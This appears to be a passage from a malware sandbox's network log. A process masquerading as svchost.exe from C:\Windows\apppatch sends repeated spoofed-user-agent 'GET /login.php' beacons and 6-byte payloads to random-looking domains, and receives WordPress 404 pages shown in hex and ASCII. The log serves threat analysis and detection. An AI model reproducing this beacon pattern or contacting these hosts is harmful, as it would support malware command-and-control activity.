i-amphtml-b
2024-08-23 16:47:19 UTC	1369	IN	Data Raw: 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69 Data Ascii: ">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-si

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	51121	188.114.97.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:47:21 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:47:21 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:47:23 UTC	895	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:47:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="17.2",amp_tag_and_attribute_sanitizer;dur="19.6",amp_optimizer;dur="17.2" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmXPl4H3lnGaq8wJ03Ls33UfueLVhUX7ngG3VR0312p0U1%2FJv7bEifNzTAVESPBL1v8pLRPy06bCM9c8Lv16pzdl4jX2nFxN19tHmoOngQq1wBkAAz8hGSnTKLLwRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c957fde8a4346-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:47:23 UTC	474	IN	Data Raw: 37 63 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c32<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-08-23 16:47:23 UTC	1369	IN	Data Raw: 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69 7a 65 Data Ascii: html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	64278	188.114.96.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:47:52 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:47:52 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:47:52 UTC	767	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:47:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkJxZ2bENh0IwZaZqePG7%2BBTYV%2BZf%2BMujWtx36pGR3OkXJIKhAHHcmiVY%2BmXOnZQjVu7nUie8vseIRlSihFlsW6PrBy%2FvU1YCNNs4xcR2biCNd%2FJ70L2bG6uhfe3%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9640b83a0f88-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:47:52 UTC	602	IN	Data Raw: 37 63 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 Data Ascii: ound -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 Data Ascii: ght),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.e
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 Data Ascii: e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}cat
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 Data Ascii: ' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-def
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 Data Ascii: e-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-heig
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b Data Ascii: or:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c Data Ascii: ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-singl
2024-08-23 16:47:52 UTC	1369	IN	Data Raw: 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 Data Ascii: ext"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	64286	188.114.96.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:47:54 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:47:54 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:47:54 UTC	761	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:47:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnF3EXksuUmW8G7Xy3uWgo3IZPagsRp7mUrDsP4d7e%2FOL8KIhiccdMKuvLW1%2Fd1pEzqtf%2FEpFJLS72TEOUrjYeOa8Kih7xLUPwFdBiaflP8rOErS3LlZVN%2F5iojKxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c964aec4b7d08-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:47:54 UTC	608	IN	Data Raw: 37 63 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb7<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){
